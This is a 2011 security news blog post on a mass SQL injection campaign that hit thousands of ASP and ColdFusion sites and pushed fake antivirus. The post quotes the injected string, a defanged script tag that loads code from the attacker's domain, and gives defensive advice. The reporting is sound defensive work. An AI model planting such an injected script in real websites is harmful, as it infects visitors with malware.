Monday, December 5, 2011

New Mass SQL Injection Attack Underway, Spreading Fake Antivirus

SQL InjectionA massive SQL injection attack is currently underway, according to Mark Hofman at the Internet Storm Center.

The attack was brought to light when reports began surfacing that the following string had been injected into several tables on numerous sites:
"></title><script src="hXXp://lilupophilupop.com/sl.php"></script>

When Hofman first discovered the infection on Thursday, only 80 websites had been hit. As of this writing, Google shows over 9,150 websites carrying the malicious string.

“Targets include ASP sites and Coldfusion,” Hofman wrote. “The attack seems to work on all versions of MSSQL.”

The sources of the attack are said to vary, although it is automated and has been compared to lizamoon. Hofman advises to monitor Microsoft Internet Information Services (IIS) log files and verify that applications only have the read/write access that's necessary.

Folks that visit the infected sites are being redirected to websites that push fake antivirus software or other forms of malware disguised as bogus Adobe Flash updates.

It's suggested that users block the lilupophilupop.com domain in order to avoid being infected by a compromised site.

Photo Credit: mwin

Be sure to follow us on Twitter at @hyphenet or “Like” us on Facebook to stay up-to-date on the latest tech news & PC security threats.

 

No comments:

Post a Comment